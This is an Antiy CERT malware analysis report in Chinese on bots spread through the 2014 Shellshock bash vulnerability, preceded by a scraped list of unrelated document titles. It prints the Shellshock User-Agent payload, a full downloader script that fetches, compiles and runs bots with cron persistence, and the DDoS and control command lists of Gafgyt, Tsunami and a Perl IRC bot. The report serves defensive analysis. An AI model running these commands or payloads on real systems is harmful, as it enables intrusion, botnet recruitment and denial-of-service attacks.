“破壳”漏洞相关恶意代码样本分析报告_V1.9

Similar documents
Trojan[DDOS]/Linux. Znaich分析笔记

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0

穨UPSentry_SC_.PDF

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器

ch08.PDF

IP505SM_manual_cn.doc

untitled

C6_ppt.PDF

ext-web-auth-wlc.pdf

软件概述

R3105+ ADSL

<4D F736F F F696E74202D FC2B2B3F85FA44AAB49B0BBB4FABB50B977A8BEA874B2CEC2B2A4B6BB50C0B3A5CE2E707074>

ARP ICMP

SL2511 SR Plus 操作手冊_單面.doc

2015绿盟科技DDoS威胁报告

網路安全:理論與實務 第二版

Chapter #

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP #

XXXXXXXX

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南

WebSphere Studio Application Developer IBM Portal Toolkit... 2/21 1. WebSphere Portal Portal WebSphere Application Server stopserver.bat -configfile..

多起利用PowerShell传播

.. 3 N

四、實務實習課程之實習工作日誌(請貼上掃描檔)

掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er)

飞鱼星多WAN防火墙路由器用户手册

自由軟體教學平台

Junos Pulse Mobile Security R1 2012, Juniper Networks, Inc.

untitled

ebook35-2

标题

一、

宁夏专业技术人员服务平台


(UTM???U_935_938_955_958_959 V )

自由軟體教學平台

ebook65-20

营 销 策 划 岗 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 6 参 与 项 目 产 品 研 究 客 户 需 求 研 究 竞 争 环 境 研 究 价 格 研 究 等 项 目 市 场 研 究 ; 7 公 司 经 纪 业 务 的 品 牌 管 理, 对

Microsoft Word - PS2_linux_guide_cn.doc

目 標 評 核 項 目 中 央 研 究 院 102 年 總 辦 事 處 計 算 中 心 績 效 評 比 報 告 執 行 績 效 ( 含 設 定 目 標 之 複 雜 度 及 挑 戰 性 目 標 達 成 度 實 際 成 效 ) 共 同 性 評 核 項 目 一 行 政 效 能 ( 一 ) 建 置 本 院

<4D F736F F D D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63>

首例具有中文提示的比特币勒索软件”locky“

ebook177-1

untitled

BYOD Http Redirect convergence Client (1) 2008R2 NLB( ) (2) NLB Unicast mode switch flooding (arp ) NLB DNS Redirect 1. Round-Robin DNS DNS IP/DNS Cli

Web

NetST 2300系列防火墙产品白皮书

D-link用户手册.doc

專業式報告

魔鼬”木马DDoS事件分析

C3_ppt.PDF

11N 无线宽带路由器

PTS7_Manual.PDF

TH-1003_MN.pptx

epub 61-2

( ) ( ) 2011 ( ) 88 / 131

本文由筱驀釹贡献

2

AL-MX200 Series

第 11 章 互聯網技術 11.1 互聯 網 和 萬 維 網 的 發 展 歷 史 A. 互聯網的發展 互聯網是由 ARPANET 開 始發展的 1969 年 美國國防部高級研究計劃署 (ARPA) 把部分軍事研究所和大 的電腦連接起來 建造了㆒個實驗性的電腦網絡 稱為 ARPANET 並 列 的功能

Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7.

untitled

1

PL600 IPPBX 用户手册_V2.0_.doc

專業式報告

Microsoft Word - 在VMWare-5.5+RedHat-9下建立本机QTopia-2.1.1虚拟平台a.doc

利用路由器传播的DYREZA家族变种分析

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco

Microsoft Word - linux命令及建议.doc

<B1B1BEA9B9E2BBB7D0C2CDF8BFC6BCBCB9C9B7DDD3D0CFDEB9ABCBBEB4B43F3F12FB6CB293>

SEC-220

Trend Micro


快 速 入 门 (Linux) 概 述 文 档 目 的 本 文 档 介 绍 了 如 何 快 速 创 建 Linux 系 统 实 例 远 程 连 接 实 例 部 署 环 境 等 旨 在 引 导 您 一 站 式 完 成 实 例 的 创 建 登 录 和 快 速 环 境 部 署 云 服 务 器 ECS 实

温州市政府分散采购

KL DSC DEMO 使用说明

ebook70-13

1 产 品 简 介 特 性 包 装 产 品 外 观 电 脑 系 统 要 求 硬 件 安 装 软 件 安 装 软 件 操 作 IP

INTRODUCTION 1. 简 介 2. 关 于 这 本 指 南 2

“破壳”漏洞(CVE )综合分析_V1.53

计算机网络实验说明

静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo

安全公告

ebook62-1

epub83-1

信息安全保障参考文件

目录

ebook140-9

Linux Ubuntu Part Linux Ubuntu Linux UNIX...19 Linux...19 Linux Linux...21 Linux GNU FSF Open So urce.

P4i45GL_GV-R50-CN.p65

專業式報告

ch09.PDF

A9RF716.tmp

untitled

《计算机网络》实验指导书

揭秘物联网僵尸网络 Gafgyt 家族与 NetCore 后门的背后故事

思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本

<4D F736F F F696E74202D20A1B6CFEEC4BFD2BB20B3F5CAB6BCC6CBE3BBFACDF8C2E7A1B7C8CECEF1C8FD20CAECCFA A1A24950D0ADD2E9BACD4950B5D8D6B72E707074>

Transcription:

破壳 漏洞系列分析之二 安天实验室安全研究与应急处理中心 ( 安天 CERT) 首次发布时间 :2014 年 9 月 29 日 17 时 本版本更新时间 :2014 年 10 月 19 日 09 时 30 分

目录 1 破壳 漏洞概述... 2 2 网络数据包... 2 3 相关的恶意代码... 3 3.1 恶意代码信息... 3 3.2 恶意代码流程分析... 17 4 恶意代码同源性分析... 18 5 走出蠕虫地带 ( 代小结 )... 19 附录一 : 参考资料... 21 附录二 : 关于安天... 22 附录三 : 文档更新日志... 22 安天实验室版权所有, 欢迎无损转载第 1 页

1 破壳 漏洞概述 安天实验室安全研究与应急处理中心 ( 以下简称 : 安天 CERT) 于 9 月 25 日凌晨开始响应 破壳 漏洞, 针对该漏洞的背景 原理等进行了快速地分析, 摸索完善了验证方法和网络检测方法 并于 9 月 25 日 10 时发布了 破壳 漏洞 (CVE-2014-6271) 综合分析 ( 对应网址 : http://www.antiy.com/response/cve-2014-6271.html), 并更新了多个版本 在这个过程中安天监测采集和样本交换体系发现了大量利用该漏洞的扫描攻击 后门投放等行为, 并发现了多个与此漏洞相关的恶意代码 2 网络数据包 基于漏洞的特点, 安天利用与高校联合部署的 探云 体系等进行了流量监测 发现了捕获了部分网 络攻击行为, 下面列举一个攻击包进行说明 : 从数据包信息可知 : 来源 40:00:35:06:57:a2 目的 45:00:00:f7:93:86 Host 124.128.18.77 User-Agent () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh" 主要攻击载荷位于 User-Agent 信息, 由于相关漏洞利用原理在 破壳 漏洞 (CVE-2014-6271) 综合分析 中都已分析过, 我们不再赘述 从攻击载荷中我们可见, 下载 regular.bot 文件到 /tmp 目录, 命名为 sh 安天实验室版权所有, 欢迎无损转载第 2 页

文件, 并执行这个文件, 执行中去下载了其它恶意代码文件, 然后删除此文件 用于攻击的 sh 文件和再次下载的恶意代码文件, 都针对 Linux\Unix\Mac OS 等目标系统, 格式为 :ELF 文件或 perl bash 脚本 针对 CGI-BASH 的利用漏洞的传播方式非常好实现, 几句脚本就能够完成, 核心是运用构造好的 Http 头, 针对不同的 IP 进行探测,IP 只要在 Host 信息更换即可 3 相关的恶意代码 3.1 恶意代码信息 安天实验室版权所有, 欢迎无损转载第 3 页

1. 恶意代码信息 : 样本命名 原始文件名 对应样本 MD5 HASH 样本大小 (b) 格式 Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 5B345869F7785F980E8FF7EBC001E0C7 534,988 BinExecute/Linux.ELF[:X86] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 7DA247A78D11ED80F0282093824B5EEF 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 74CF76B67834333AF8B36BA89C1980C1 534,988 BinExecute/Linux.ELF[:X86] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 371B8B20D4DD207F7B3F61BB30A7CB22 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 5924BCC045BB7039F55C6CE29234E29A 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.WopBot 未知 ( 第三方样本 ) 8DC64426F9D07587C19E10F1BB3D2799 525,900 BinExecute/Linux.ELF[:X64] Trojan/Linux.Small 未知 ( 第三方样本 ) 2485040231A35B7A465361FAF92A512D 152 BinExecute/Linux.ELF[:X64] Trojan[Downloader]/Shell.Agent regular.bot 2120361F5E06E89E9387D044C7B0E7B0 701 Text/Shell.SH Trojan[Bot]/Linux.Tsunami kaiten.c E5807250E25DA45E287AFB2F1E4580D6 391,30 Text/Dennis.C Trojan[Bot]/Linux.Tsunami a 7390A1E62A88EB80B5FAE80C9EB00BE7 982,256 BinExecute/Linux.ELF[:X64] Trojan[Bot]/OSX.Tsunami darwin ADACF1FA8CD7F77AE83BA38A99160BDB 42,436 BinExecute/OSX.APP Trojan[Bot]/Perl.IRCBot pl 0C25BEE177101B4235022D694C0DE4D3 66,395 Text/Perl.Pl 安天实验室版权所有, 欢迎无损转载第 4 页

2. 样本分析卡片 : 样本命名 Trojan*Bot+/Linux.Gafgyt.a 样本 MD5 5924BCC045BB7039F55C6CE29234E29A 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian 3.14.5 X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 :89.238.***. ***:5 主动连接控制端, 一旦连接成功, 便等待远程命令 获取本机 IP 连接服务器 TCP Flood DDOS 攻击 UDP Flood DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 5 页

Hold Flood DDOS 攻击. 结束攻击指令 弱口令字典 主要行为 : 样本运行后尝试连接 162.253.66.76:53/ 89.238.150.154:5 中的一个服务器 从以下文件中收集信息回传给服务器 :/proc/cpuinfo /proc/meminfo /proc/net/route 连接指定 IP 范围内计算机的 23 端口, 账号密码通过弱口令字典生成 从远程服务器接受指令运行, 具体指令格式如下 : 控制命令 格式 响应命令 PING - "PONG!" GETLOCALIP - "My IP: <local_ip>" SCANNER <MODE> "SCANNER ON OFF" if num_args!= 1, spawned thread responds otherwise? HOLD <IP> <PORT> <SECONDS> "HOLD Flooding <IP>:<PORT> for <SECONDS> seconds." JUNK <IP> <PORT> <SECONDS> "JUNK Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages UDP <IP> <PORT> <SECONDS> <RAW/DGRAM> <PKT_SIZE> <THREADS> "UDP Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages TCP <TARGETS,> <PORT> <SECONDS> <TCP_FLAGS,> <PKT_SIZE> <PKT_BURST> "TCP Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages KILLATTK - "Killed <NUMBER_OF_ATTK_THREADS>." or "None Killed." LOLNOGTFO - None (exits bot process) 结论 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏 安天实验室版权所有, 欢迎无损转载第 6 页

洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 371B8B20D4DD207F7B3F61BB30A7CB22 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian 3.14.5 X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 :162.253. **.**:53 主动连接控制端, 一旦连接成功, 便等待远程命令 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅存在服务器 IP 差异, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 结论是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 5B345869F7785F980E8FF7EBC001E0C7 样本大小 (b) 534,988b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X86] 运行状态 样本反汇编分析 在 Debian 3.14.5 X86_64 测试, 无法运行, 是 ELF 32 位程序控制命令 :PING GETLOCALIP HOLD JUNK UDP TCP KILLATTK LOLNOGTFO 等连接远程 IP: 端口 :162.253. **.**:53 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅存在服务器 IP 差异, 其他代码均完全相同, 此处不 安天实验室版权所有, 欢迎无损转载第 7 页

在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 7DA247A78D11ED80F0282093824B5EEF 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian 3.14.5 X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 :89.238. ***.***:5 主动连接控制端, 一旦连接成功, 便等待远程命令 结论 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅在数据段存在 93 字节差异, 不影响样本功能, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 74CF76B67834333AF8B36BA89C1980C1 样本大小 (b) 534,988b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X86] 运行状态 在 Debian 3.14.5 X86_64 测试, 无法运行, 是 ELF 32 位程序 样本反汇编分析连接远程 IP: 端口 :89.238. ***.***:5 安天实验室版权所有, 欢迎无损转载第 8 页

该样本与 5924BCC045BB7039F55C6CE29234E29A 仅在数据段存在 93 字节差异, 不影响具体功能, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 样本命名 Trojan[Backdoor]Linux.WopBot 样本 MD5 8DC64426F9D07587C19E10F1BB3D2799 样本大小 (b) 525,900b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian 3.14.5 X86_64 测试, 显示 :Wopbot has started 联网目标 样本反汇编分析 连接远程 IP: 端口 :89.238. ***.***:9003 主动连接控制端, 一旦连接成功, 便等待远程命令 UDP DDOS 攻击 SYN DDOS 攻击 TCP DDOS 攻击 HTTP DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 9 页

结论 MINELORIS 指令结束攻击指令 样本运行后连接服务器接受指令控制, 主要指令都是 DDOS 相关, 如 :kill udp syn tcpamp dildos http mineloris 等 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan/Linux.Small 样本 MD5 2485040231A35B7A465361FAF92A512D 样本大小 (b) 152b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian 3.14.5 X86_64 测试, 无任何显示, 但已执行 样本反汇编分析 连接远程 IP: 端口 :27.19. ***.***:4545 安天实验室版权所有, 欢迎无损转载第 10 页

结论 样本代码非常少, 运行后连接 27.*.*.224 下载文件到 /bin//sh 并运行 主动连接控网络, 下载恶意程序 样本命名样本 MD5 样本大小 (b) 原始文件名格式运行状态网络行为脚本内容 Trojan[Downloader]/Shell.Agent 2120361F5E06E89E9387D044C7B0E7B0 701b regular.bot Text/Shell.SH 运用 gcc 编译 kaiten.c, 执行 a, 执行 darwin, 执行 pl, 添加计划任务下载 :kaiten.c a darwin pl killall perl wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c; curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c; gcc -o /tmp/a /tmp/a.c; /tmp/a; rm -rf /tmp/a.c; wget http://stablehost.us/bots/a -O /tmp/a; curl -o /tmp/a http://stablehost.us/bots/a; chmod +x /tmp/a; /tmp/a; wget http://stablehost.us/bots/darwin -O /tmp/d; curl -o /tmp/d http://stablehost.us/bots/darwin; chmod +x /tmp/d; /tmp/d; wget http://stablehost.us/bots/pl -O /tmp/pl; curl -o /tmp/pl http://stablehost.us/bots/pl; perl /tmp/pl; rm /tmp/pl; 结论 echo "@weekly curl -o /tmp/sh http://stablehost.us/bots/regular.bot;wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh" >/tmp/c; crontab /tmp/c; rm /tmp/c; 是一个 sell 脚本, 下载 Bot 文件并运行, 将更新 URL 添加到计划任务, 定期下载执行 样本命名 Trojan[Backdoor]/Linux.Tsunami 样本 MD5 E5807250E25DA45E287AFB2F1E4580D6 样本大小 (b) 391,30b 原始文件名 kaiten.c 安天实验室版权所有, 欢迎无损转载第 11 页

格式 Text/Dennis.C 来源地址 stablehost.us/bots/kaiten.c 网络行为 编译执行后连接 linksys.secureshellz.net 样本格式 C 源码 主要功能 发起各类 SYN 和 UDP 的分布式拒绝服务攻击 下载并执行远程文件 更改客户端的昵称 更改服务器地址 发送 UDP 数据包 结束进程 网络数据抓包 发起洪水攻击 kaiten.c 文件中的所列的攻击指令列表如下 : * TSUNAMI <target> <secs> = A PUSH+ACK flooder * * PAN <target> <port> <secs> = A SYN flooder * * UDP <target> <port> <secs> = An UDP flooder * * UNKNOWN <target> <secs> = Another non-spoof udp flooder * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from this bot * * ENABLE = Enables all packeting from this bot * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * 部分函数代码 : 安天实验室版权所有, 欢迎无损转载第 12 页

TSUNAMI 攻击代码 SYN DDOS 攻击代码 UDP DDOS 攻击代码 安天实验室版权所有, 欢迎无损转载第 13 页

结论 下载文件代码 这是一个名为 Tsunami 的 IRC DDOS client 的 C 源码文件, 利用 破壳 漏洞下载到目标主机, 并使用 gcc 命令编译为可执行程序后在目标主机执行 样本命名 Trojan[Backdoor]/Linux.Tsunami 样本 MD5 7390A1E62A88EB80B5FAE80C9EB00BE7 样本大小 (b) 982,256b 原始文件名 a 格式 BinExecute/Linux.ELF[:X64] 来源地址 stablehost.us/bots/a 网络行为 连接 :linksys.secureshellz.net 样本格式 ELF 64-bit 反汇编分析 服务器地址 更新服务器地址 安天实验室版权所有, 欢迎无损转载第 14 页

结束自身 运行文件 下载其他文件 发起各类 SYN 和 UDP 的分布式拒绝服务攻击, 具体如下 : TSUNAMI: 构造特殊包穿透大部分防火墙 PAN: 一种高级的 SYN DDOS 攻击 UDP: 常规 UDP DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 15 页

结论 UNKNOWN: 另一种 UDP DDOS 攻击 NICK: 修改客户端名称 SERVER: 修改服务器 ENABLE/DISABLE: 开启 关闭抓包更改客户端的昵称这是一个 Linux 僵尸网络程序, 运行后会连接远程服务器, 接受攻击者指令控制被感染主机 样本命名 Trojan[Backdoor]/OSX.Tsunami 样本 MD5 ADACF1FA8CD7F77AE83BA38A99160BDB 样本大小 (b) 42,436b 原始文件名 darwin 格式 BinExecute/OSX.APP 来源地址 stablehost.us/bots/darwin 网络行为 linksys.secureshellz.net 样本格式 Mac OS X 64bit 主要功能 该样本与 7390A1E62A88EB80B5FAE80C9EB00BE7 是相同的恶意代码, 代码功能完全相同, 只是运行 的环境为 Mac, 具体功能可参见 7390A1E62A88EB80B5FAE80C9EB00BE7 结论 这是一个 Mac 僵尸网络程序, 运行后会连接远程服务器, 接受攻击者指令控制被感染主机 样本命名 Trojan[Backdoor]/Perl.IRCBot 样本 MD5 0C25BEE177101B4235022D694C0DE4D3 样本大小 (b) 66,395b 原始文件名 pl 格式 Text/Perl.Pl 来源地址 stablehost.us/bots/pl 网络行为 连接远程 IP: 端口 :125.211. ***.***:25 (linksys.secureshellz.net) 主要功能 渗透攻击 : 多线程扫描 sock5 代理 SQL 攻击 端口扫描 发送邮件 nmap 扫描等 从 packetstorm milw0rm 获取最新漏洞信息 DDos:udp tcp http sql 洪水攻击 开放 IRC 通道 扫描 google msn ask yahoo search 等域 pl 脚本中的命令列表 #-----[Hacking Based]----- #!bot @multiscan <vuln> <dork> #!bot @socks5 #!bot @sql2 <vuln> <dork> <col> #!bot @portscan <ip> #!bot @logcleaner #!bot @sendmail <subject> <sender> <recipient> <message> #!bot @system #!bot @cleartmp 安天实验室版权所有, 欢迎无损转载第 16 页

#!bot @rootable #!bot @nmap <ip> <beginport> <endport> #!bot @back <ip><port> #!bot @linuxhelp #!bot @cd tmp:. for example #-----[Advisory-New Based]----- #!bot @packetstorm #!bot @milw0rm #-----[DDos Based]----- #!bot @udpflood <host> <packet size> <time> #!bot @tcpflood <host> <port> <packet size> <time> #!bot @httpflood <host> <time> #!bot @sqlflood <host> <time> #-----[IRC Based]----- #!bot @killme #!bot @join #channel #!bot @part #channel #!bot @reset #!bot @voice <who> #!bot @owner <who> #!bot @deowner <who> #!bot @devoice <who> #!bot @halfop <who> #!bot @dehalfop <who> #!bot @op <who> #!bot @deop <who> #-----[Flooding Based]----- #!bot @msgflood <who> #!bot @dccflood <who> #!bot @ctcpflood <who> #!bot @noticeflood <who> #!bot @channelflood #!bot @maxiflood <who> #################################### 相关配置 指令配置 :hxxp://chynthea.org/injector/c99.txt??? ID 配置 :hxxp://www.fileden.com/files/2009/12/5/2676962/ajimbu ircname :"telnet","putty","cgi-bin","bash","tmp","var","omset","dat","chynthe","bed" 结论这是一个 Perl 脚本编写的僵尸网络程序, 根据内部配置和控制端发送的指令进行相应的攻击 3.2 恶意代码流程分析 安天 探云 系统及形成部署的 VDS 网络病毒监控设备均捕获到大量攻击包 通过对其中的攻击载荷 的提取, 发现存在大量自动的重复载荷投放 例如第二章中的数据包中的载荷就存在大量重复投放的现象 安天实验室版权所有, 欢迎无损转载第 17 页

这样便可实现批量的攻击 下面以第二章所列出的数据包的相关攻击过程为例, 分析其攻击和使用相关样 本的作业过程 图 3-1 中 4 个相关样本均为僵尸网络程序, 得出攻击者是将不同操作系统 运行环境下编 译的同一源程序文件进行投放, 以达到能够感染 Linux Mac 及支持 gcc 或 Perl 环境的相关系统 图 3-1 漏洞与样本作业流程图 4 恶意代码同源性分析 为了适应 32 位与 64 位结构, 在两种版本的操作系统上都能够运行, 攻击者进行了同一源码的多次的编译 为了能够躲避反病毒软件的检测查杀, 攻击者也进行了简单的混淆 但无论是不同版本编译, 还是做各种混淆, 攻击者基于同一源码所做的程序文件仍能够找到共同点, 这些共同点为我们确定同源性提供了便利 具体见图 4-1, 我们发现在两个不同事件中的 6 个 破壳 投放的 Bot 具有同源性 安天实验室版权所有, 欢迎无损转载第 18 页

图 4-1 恶意代码同源性分析图 5 走出蠕虫地带 ( 代小结 ) 我们在 破壳 漏洞 (CVE-2014-6271) 综合分析 报告中指出 破壳 漏洞 易于利用其编写蠕虫进行自动化传播, 同时也将导致僵尸网络的发展 几年来, 尽管我们捕获的蠕虫样本数量还在持续增长, 但其中真正有重大影响力的蠕虫确实并不多见 但今天, 我们看到了 蠕虫 这个熟悉而陌生的老对手, 借助 破壳 漏洞借尸还魂 如果说技术的发展是一个上升的螺旋, 在某一时刻会表现出 高阶重复 的话, 那么威胁的演进何尝不是如此呢? 反病毒工作者和反病毒产品为消亡蠕虫进行了很多尝试, 但蠕虫大面积减少的更大原因还是其生态的变化 Windows 系统控制 Outlook 的外部调用, 沉重打击了邮件蠕虫的传播 ;DEP ASLR UAC 等机制的引入, 大大降低了扫描溢出型蠕虫传播的效果 ; 对自动播放的控制, 又降低了 U 盘传播 而从另一个角度看, 随着漏洞私密化 攻击定向化的趋势, 有编写蠕虫价值的漏洞, 都被攻击者深藏武库, 谨慎使用 而同时, 一些僵尸网络的控制者, 也逐渐把利用蠕虫的方式扩展规模, 改为捆绑和 FAKEAV 等其他方式 走出蠕虫地带 是安天技术负责人在去年 XDEF 峰会上的同名报告, 也是安天 AVER 反思三部曲的第二部 报告反思了我们现有的大量从感知到分析的技术体系, 都是在蠕虫时代发端建立起来的, 其假定威胁的核心特点是攻击载荷不断重复投放 传播路径是从若干源头的树状展开 被感染的节点会大量分布 显然这种机制在 APT 的应对中变得薄弱和力不从心 而同时我们也看到更多用户也是在大规模蠕虫泛滥时, 逐渐建立起安全观念的, 往往只有网络大量阻塞时, 人们才感到网络威胁的价值 而此间, 那些更高级 安天实验室版权所有, 欢迎无损转载第 19 页

隐蔽可以带来战略影响的攻击与窃密则可能被忽略了 这次也是如此, 连我们自己都是在相关 BOT 和蠕虫出现后, 变得兴奋度提高 但我们要慎重看待这种 高阶重复 如果说一切安全威胁都存在着必然性, 有其规律和动力的话 我们只能说, 当漏洞掌握在少数攻击者手中时, 可能其表象会是发生在定向攻击乃至 APT 攻击当中, 以提高成功率和降低感知 但当严重漏洞一旦公开, 其不再具有任何隐蔽性可言, 而大量用户启动修补流程, 可攻击节点不断减少的时候 就会有更多的攻击者开始了利益最大化的数据或者节点的攫取, 此时 列王的纷争 就会变成 群鸦的盛宴 关于 心脏出血 是三年来最严重的漏洞定性后不过半年, 破壳 漏洞突然曝光, 然不过几日 : CVE-2014-6271 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-6277 接踵而至 严重漏洞的披露, 经常有示范和攀比效应, 这是我们暂时能想到的 扎堆到来 的成因 每个地震都有连锁余震, 之后群鸦漫天 同时, 站在一个更熟悉 Windows 的安全团队视角看 Linux/MacOS, 无疑会有很多茫然, 重新编译带来诸多的不变, 大量版本带来的碎片化, 又给修补带来了很多不确定性 而自带的编译器和丰富的脚本则既是程序员的舞台, 也是攻击者的土壤 我们在 Windows 攻防中, 也经常可见 BAT 和 VBS 脚本, 但通常都是配角而非恶意代码功能主体 而除非目标是代码污染, 把一段 C++ 源码或者工程丢到被攻击者的场景中去编译的行为更非常罕见 而本报告中的 gcc 源码和 perl 脚本, 则价值完全不同, 而这种模式在过去和未来也都并不陌生 这个方式既符合场景特点, 同时也是一个轻量级的 免杀 而未来 Linux/MacOS 将是重要的攻防战场, 尽管相关恶意代码的加壳 混淆工具和 Windows 下大量的地下壳 商用壳相比还那样简单幼稚, 但一切早已经开始了 此版本修订完成之际临近午饭, 此时正值国庆假期前最后一个工作日, 后勤组的同事正在分发福利, 多数下午同事会提前放假 而我们, 代号 弹头 的安天深度分析组会留下坚守 这种感觉在安天的集体记忆中似曾相识,2003 年的 Slammer 爆发就在农历腊月二十三 被称为小年的那一天, 窗外鞭炮齐鸣, 网络上病毒数据包蜂拥而过, 而安天人在突击的编写检测和处置工具 2004 年 5 月 1 日, 当 pluck 等辗转在回家的长途车上的时候, 他从短信里知道了震荡波蠕虫爆发的消息, 以及要求归队的命令 威胁经常在人们不期望它们到来的时候到来, 也许是无心的雪崩, 也许是有意的蓄谋 病毒不会在星期天休息 这是安天新员工培训时必须传递的一句话, 我们从柏松那里听到过这句话, 我们也把这句话讲给过安天的新人 我们也许会在一瞬间被威胁打的措手不及, 但不会有威胁能长久的逃逸出我们的感知和分析 谨把我们的工作献给我们家人 我们的战友和我们的祖国 安天实验室版权所有, 欢迎无损转载第 20 页

附录一 : 参考资料 [1] 安天实验室 : " 破壳 " 漏洞 (CVE-2014-6271) 综合分析 http://www.antiy.com/response/cve-2014-6271.html [2] 知道创宇 : 破壳漏洞(ShellShock) 应急概要 http://blog.knownsec.com/2014/09/shellshock_response_profile/ [3] 知道创宇 : Bash 3.0-4.3 命令执行漏洞分析 http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/ [4] First Shellshock botnet attacks Akamai US DoD networks 安天实验室版权所有, 欢迎无损转载第 21 页

http://www.itnews.com.au/news/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx [5] Linux ELF bash 0day (shellshock): The fun has only just begun... http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html [6] 安天实验室 : 走出蠕虫木马地带 AVER 反思三部曲之二 http://www.antiy.com/presentation/methodology_aver_introspection_trilogy_ii.html 附录二 : 关于安天 安天是专业的下一代安全检测引擎研发企业, 安天的检测引擎为网络安全产品和移动设备提供病毒和各种恶意代码的检测能力, 并被超过十家以上的著名安全厂商所采用, 全球有数万台防火墙和数千万部手机的安全软件内置有安天的引擎 安天获得了 2013 年度 AV-TEST 年度移动设备最佳保护奖 依托引擎 沙箱和后台体系的能力, 安天进一步为行业企业提供有自身特色的基于流量的反 APT 解决方案 关于反病毒引擎更多信息请访问 : http://www.antiy.com( 中文 ) http://www.antiy.net ( 英文 ) 关于安天反 APT 相关产品更多信息请访问 : http://www.antiy.cn 附录三 : 文档更新日志 更新日期 更新版本 更新内容 2014-09-29 10:00 V1.0 文档创建 文档架构 文档概述 2014-09-29 12:00 V1.1 网络数据包 恶意代码分析 